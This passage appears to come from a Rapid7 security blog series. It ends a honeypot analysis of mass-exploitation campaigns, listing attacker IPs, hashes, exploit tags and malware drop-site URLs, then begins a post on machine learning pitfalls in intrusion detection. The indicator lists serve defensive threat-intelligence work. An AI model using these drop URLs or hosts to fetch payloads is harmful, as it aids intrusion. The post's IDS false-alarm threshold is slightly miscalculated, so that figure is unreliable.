| | | | 2x 91.191.170.111 | 1x DE | 2x AS43391 | 1x BR | | | CVE-2014-3120 | 2x 05f32da77a9c70f429c35828d73d68696ca844f2 | 2x http://37.59.8.213/pacs |
| | | | 1x 142.54.187.42 | | 1x AS30083 | | | | EXEC-SHELLCMD | | 2x http://69.30.200.250/jof |
| | | | 1x 209.126.110.239 | | 1x AS32613 | | | | | | 1x http://69.58.3.226/api |
| | | | 1x 174.142.46.120 | | 1x AS24940 | | | | | | 1x http://192.240.106.106/dax.exe |
| | | | 1x 136.243.110.172 | | 1x AS33387 | | | | | | 1x http://174.142.46.120/lma1 |
| | | | | | | | | | | | 1x http://69.12.70.34/api |
| | | | | | | | | | | | 1x http://188.138.41.134/lma1 |
| | | | | | | | | | | | 1x http://192.240.106.106/pisd |
| | | | | | | | | | | | 1x http://69.30.200.250/jla.cp |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 13 | 42 | first: 2015-04-23 | 22x 104.192.0.18 | 22x US | 22x AS27176 | 14x US | 21x 10000 | 42x GET | 42x VULN-QNAP-SHELLSHOCK | 12x 37c5ca684c2f7c9f5a9afd939bc2845c98ef5853 | 20x http://104.192.0.18/apache |
| | | last: 2015-04-27 | 20x 37.220.36.77 | 20x NL | 20x AS58073 | 10x IE | 18x 7778 | | | 12x 3e4e34a51b157e5365caa904cbddc619146ae65c | 12x http://104.192.0.18/syn |
| | | | | | | 8x SG | 3x 8080 | | | 7x 9d3442cfecf6e850a2d89d2817121e46f796a1b1 | 7x http://104.192.0.18/apache2 |
| | | | | | | 7x BR | | | | 7x 9851bcec479204f47a3642177c75a16b58d44c20 | 3x http://104.192.0.18/jawk |
| | | | | | | 3x AU | | | | 3x 1a412791a58dca7fc87284e208365d36d19fd864 | |
| | | | | | | | | | | 1x d538717c89943f42716c139426c031a21b83c236 | |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+

What else?

As mentioned before, this can be done in much more detail by analyzing the samples further and extracting better and more numerous indicators than just the contacted C2 hosts. There is probably also more data around the hosts and domains used for the drop sites (the payload URLs) that could be used to correlate different sets.
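To sketch what such extra indicators could look like: any new relationship can be folded into the same GRAPH with additional edge types, and the traversal above picks them up for free. The fields used here (url.path, mal.mutexes) are hypothetical stand-ins for whatever your honeypot and sandbox pipeline actually records:

# Hypothetical extra indicator types layered onto the same GRAPH.
# "url.path" and "mal.mutexes" are invented field names for illustration;
# substitute whatever your honeypot / sandbox really produces.
for e in DATA:
    payload = ("payload", e["sha1"])
    # the URL path (e.g. "/scans/php77.tar") often persists across drop hosts
    if e.get("url.path"):
        add_edge(payload, ("droppath", e["url.path"]))
    # mutex names extracted from sandbox runs are a classic family indicator
    for m in e.get("mal.mutexes", []):
        add_edge(payload, ("mutex", m))
# re-running the traversal now merges groups that share any of these indicators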
If we take some of the hosts/IPs from above and use them to query Project Sonar, we get DNS records, open ports, and certificate information:

address 104.152.190.2 had port 80/tcp open
address 61.147.107.91 was seen in DNS A record for 58559.url.dnspud.com
address 222.186.21.115 was seen in DNS A record for cc365cc-com-2015-7.com
saw cert 93e5ad9fdf4c9a432a2ebbb6b0e5e0a055051007 on endpoint 216.99.150.113:465
address 89.238.81.138 was seen in DNS A record for www.investorfinder.de
address 97.74.204.6 was seen in DNS A record for teafortwohearts.com
address 115.238.246.180 had port 80/tcp open
address 66.240.252.49 had port 993/tcp open
address 208.76.228.65 was seen in DNS A record for peoplesblueprint.ca
address 222.141.64.65 had DNS PTR record hn.kd.ny.adsl
address 180.97.215.7 was seen in DNS A record for jilijia.net
address 203.171.230.109 was seen in DNS A record for cxyt.org
elbinvestment.com had a DNS A record with value 89.31.143.1
address 222.186.30.21 was seen in DNS A record for www.lerhe.com
saw cert 25907d81d624fd05686111ae73372068488fcc6a on endpoint 178.162.207.107:993
ys-f.ys168.com had a DNS A record pointing to IP 61.147.125.116
address 180.97.215.7 had port 995/tcp open
address 213.155.180.226 had port 465/tcp open
address 113.10.149.45 was seen in DNS A record for school88le.com
...

Following this data, or adding it into the graph, can yield some interesting results - but it's also of lower "quality": most of the infrastructure used by the attackers probably consists of compromised systems that serve plenty of other purposes, so there is a lot of noise around the attackers' activity.

Summing up

Looking through these datasets can be fun, but also a bit tricky at times. Command-line kung fu and some scripting can help you pivot around the dataset if you don't want to put in the effort of using a database and something like SQL queries. Incident data and threat intelligence indicators quite often match the graph data model well, so we can make use of simple graph traversal functions, or even a real graph database, to analyze our data. In order to analyze most of the samples, I implemented Linux support in Cuckoo Sandbox. It is available in the current development branch - follow us closely for the release of the next version! Another noteworthy point is that honeypots can still yield some fun (if not always groundbreaking) data nowadays. With internet scanning becoming more popular and easier to do, a few low-skill shotgun-type attackers are joining the game and trying to get quick wins by running mass exploitation runs. Rapid7 Labs is always interested in similar stories, so if you are willing to share them, let us know what you think in the comments! Also feel free to tweet me personally @repmovsb. Happy HaxMas! -Mark

References:
[1] CARISIRT: Defaulting on Passwords (Part 1): r0_bot | CARI.net Blog
[2] Malware Must Die!: MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ
[3] Malware Must Die!: MMD-0032-2015 - The ELF ChinaZ "reloaded"

12 Days of HaXmas: Applying Machine Learning to Security Problems

This post is the eleventh in the series, "12 Days of HaXmas."

By Suchin Gururangan, Bob Rudis, and the Rapid7 Data Science Team

Anomaly detection (i.e. identifying "badness") and remediation is a hard and expensive process, fraught with false alarms and rabbit holes. The security community is keenly interested in developing and using data-driven tools to filter out noise and automatically detect malicious activity in large networks. While machine learning offers more flexibility than static, rule-based techniques, it is not a silver bullet. In this post, we will cover obstacles in applying machine learning to security and some ways to avoid them.

It's All About the Data

One core concept in machine learning is that the utility of the algorithms being used is only as strong as the datasets being used. What does this mean when applying machine learning techniques to cybersecurity? This is a bit of an oversimplification, but we generally do one of two things with machine learning:

- Put a bunch of things together into unlabeled groups (unsupervised learning)
- Identify new things as being part of already known/labeled groups (classification)

Both actions are based on the features associated with each data element. In security, we really want to be able to identify (or classify) a "thing" as good or bad. To do that, the first thing we need is labeled data. At its core, this classification process is two-fold: first, we train a model on known data, and then we test it on unknown samples. In particular, adaptable models require a continuous flow of labeled data to train with. Unfortunately, the creation of such labeled data is the most expensive and time-consuming part of the data science process. The data we have is usually messy, incomplete, and inconsistent. While there are many tools for experimenting with different algorithms and their parameters, there are few tools to help one develop clean, comprehensive datasets. Oftentimes this means asking practitioners with deep domain expertise to help label existing data elements, which is a very expensive process. You can also try to purchase "good" data, but this can be hard to come by in the context of security (and may go stale very quickly). Finally, you can try a combination of unsupervised and supervised learning called - unsurprisingly - semi-supervised learning [https://en.wikipedia.org/wiki/Semi-supervised_learning].

"The creation of labeled data is the most expensive and time-consuming part of the data science process."

Regardless of your approach, it's likely you'll spend a great deal of time, effort, and/or money in your quest for labeled data.

The Need for Unbiased Data

Bias in training data can hamper a model's ability to discern between output classes. In the security context, data bias can be interpreted in two ways. First, attack methodologies are becoming more dynamic than ever before. If a predictive model is trained on known patterns and vulnerabilities (i.e. using features from malware that is file-system resident), it may not necessarily detect an unprecedented attack that does not conform to those trends (i.e. it misses features from malware that is only memory resident). Bias can sneak up on you, as well. You may think you can use the Alexa listings to, say, obtain a list of benign domains, but that assumption may turn out to be a bad idea, since there is no guarantee that those sites are clean. Getting good ground truth in security is hard.
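To make the two-fold train/test process described above concrete, here is a minimal, hypothetical sketch using scikit-learn (not something this post prescribes; the features and labels are random placeholders, which is exactly why the score will hover around chance - real, clean labels are the hard part):

import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

# Hypothetical labeled dataset: each row is a "thing" (e.g. a URL or binary)
# described by numeric features, labeled 0 = benign, 1 = malicious.
rng = np.random.RandomState(0)
X = rng.rand(1000, 10)          # 1,000 samples, 10 invented features
y = rng.randint(0, 2, 1000)     # labels - in practice the expensive part

# first, train a model on known data ...
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0)
clf.fit(X_train, y_train)

# ... then test it on held-out, "unknown" samples
print("held-out accuracy:", clf.score(X_test, y_test))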
Data bias also comes in the form of class representation. To understand class representation bias, one can look to a core foundation of statistics: Bayes' theorem. Bayes' theorem describes the probability of event A given event B:

P(A|B) = P(B|A) P(A) / P(B)

Expanding the probability P(B) over the set of two mutually exclusive outcomes (A and not A), we arrive at the following equation:

P(B) = P(B|A) P(A) + P(B|¬A) P(¬A)

Combining the above equations, we arrive at the following alternative statement of Bayes' theorem:

P(A|B) = P(B|A) P(A) / (P(B|A) P(A) + P(B|¬A) P(¬A))

What does this have to do with security? Let's apply this theorem to a concrete problem to show the issues that emerge when training predictive models on biased data. Suppose company X has 1,000 employees, and a security vendor has deployed an intrusion detection system (IDS) that alerts company X when it detects a malicious URL sent to an employee's inbox. Suppose there are 10 malicious URLs sent to employees of company X per day. Finally, suppose the IDS analyzes 10,000 incoming URLs to company X per day. We'll use:

- I to denote an incident (i.e. an incoming malicious URL)
- ¬I to denote a non-incident (i.e. an incoming benign URL)
- A to denote an alarm (i.e. the IDS classifies an incoming URL as malicious)
- ¬A to denote a non-alarm (the IDS classifies a URL as benign)

What's the probability that an alarm is associated with a real incident? Or, how much can we trust the IDS under these conditions? Using Bayes' theorem from above, we know:

P(I|A) = P(A|I) P(I) / P(A)

We don't have to use the shorthand version, though:

P(I|A) = P(A|I) P(I) / (P(A|I) P(I) + P(A|¬I) P(¬I))

Now let's calculate the probability of an incident occurring (and not occurring) - P(incident) and P(non-incident) - given the parameters of the IDS problem we defined above:

P(I) = 10 / 10,000 = 0.001
P(¬I) = 1 - P(I) = 0.999

These probabilities emphasize the bias present in the distribution of analyzed URLs: the IDS has little sense of what makes up an incident, as it is trained on very few examples of one. Plugging the probabilities into the equation above, we find that to have reasonable confidence in an IDS under these biased conditions, we must have not only an unrealistically high hit rate, but also an unrealistically low false positive rate. That is, for an IDS to be 80 percent accurate, even with a best-case scenario of a 100 percent hit rate, the IDS' false alarm rate must be on the order of 4 x 10^-4 - roughly 4 false alarms per 10,000 benign URLs analyzed.

Visualizing Accuracy

One way to actually "see" this is with a chart designed to visually depict the accuracy of our classifier, called a receiver operating characteristic (ROC) curve:

[Figure: ROC curve, from "Proper Use of ROC Curves in Intrusion/Anomaly Detection"]

As we train, test, and use a model, we want the ratio of true positives to false positives to be better than chance, and also accurate enough to make the model worth using (in whatever context that happens to be). In the real world, detection hit rates are much lower and false alarm rates are much higher. Thus, class representation bias in the security context can make machine learning algorithms inaccurate and untrustworthy. When models are trained on only a few examples of one class but many examples of another, the bar for reasonable accuracy is extremely high, and in some cases unachievable. Predictive algorithms run the risk of being "the boy who cried wolf" - annoying and prone to desensitizing security professionals to incident alerts [2]. The last thing you want to do is create a fancy new system that only exacerbates the problem identified at the core of the Target/Home Depot breaches.
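The base-rate arithmetic above is easy to check for yourself. A quick sketch; the 1 percent false alarm rate plugged in here is an illustrative assumption (a rate most vendors would be proud of), not a figure from this post:

# Base-rate check for the hypothetical IDS above.
incidents_per_day = 10
urls_per_day = 10000

p_i = incidents_per_day / float(urls_per_day)   # P(I)  = 0.001
p_not_i = 1 - p_i                               # P(~I) = 0.999

hit_rate = 1.0            # P(A|I), the best-case assumption from above
false_alarm_rate = 0.01   # P(A|~I), an assumed "excellent-sounding" 1% rate

# P(I|A) via the expanded form of Bayes' theorem
p_i_given_a = (hit_rate * p_i) / (hit_rate * p_i + false_alarm_rate * p_not_i)

# even a 1% false alarm rate leaves only ~9% of alarms tied to real incidents
print("P(incident | alarm) = %.2f" % p_i_given_a)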
"When models are trained on only a few examples of one class but many examples of another, the bar for reasonable accuracy is extremely high, and in some cases unachievable."

Avoiding the Pitfalls

Security data scientists can avoid these obstacles with a few measures:

- Train models with large, balanced datasets that are representative of all output classes. Take balanced subsamples of your data if necessary (a quick sketch of this appears at the end of this post), and use available techniques to get an understanding of the efficacy of your datasets.
- Focus on getting a plethora of labeled data. Amazon's Mechanical Turk, used by many researchers outside of security, is one useful tool for this. Look at open sourced data, and encourage data gathering expeditions.
- Encourage security expertise on the team. Domain expertise is crucial to the performance of machine learning algorithms applied in the security space; to keep up with the changing threat landscape, one must have security experience.
- Incorporate unsupervised methods into the solution of the data science problem. Focus on organization, presentation, visualization, and filtering of data - not just prediction. Check out this handy tutorial on self-taught learning by Stanford.
- Weigh the tradeoff between accuracy (i.e. getting all the "guesses" right) and coverage. You can think of this in terms of a Bloom filter: in the case of search, it's more important that all the matching elements are returned, even if that means some incorrect elements are returned as well. Depending on the application of your classification algorithm, you may be able to make similar tradeoffs.

Machine learning has the potential to revolutionize how we detect and respond to malicious activity in our networks. It can separate the signal from the noise to help incident responders focus on what's truly important, and help administrators discover patterns in network activity never seen before. However, when applying these algorithms to security, we must be aware of the caveats of the approach so that we can overcome them.
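As a footnote to the first point in the list above, balancing by undersampling the majority class is often just a few lines. A minimal sketch, where X and y are placeholders for your real feature matrix and binary labels:

import numpy as np

def balanced_subsample(X, y, random_state=0):
    # Undersample the majority class so both classes are equally represented.
    # X: feature matrix, y: binary labels (0 = benign, 1 = malicious).
    rng = np.random.RandomState(random_state)
    idx_pos = np.where(y == 1)[0]
    idx_neg = np.where(y == 0)[0]
    n = min(len(idx_pos), len(idx_neg))
    keep = np.concatenate([
        rng.choice(idx_pos, n, replace=False),
        rng.choice(idx_neg, n, replace=False),
    ])
    rng.shuffle(keep)
    return X[keep], y[keep]

# usage: X_bal, y_bal = balanced_subsample(X, y) before fitting a classifier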
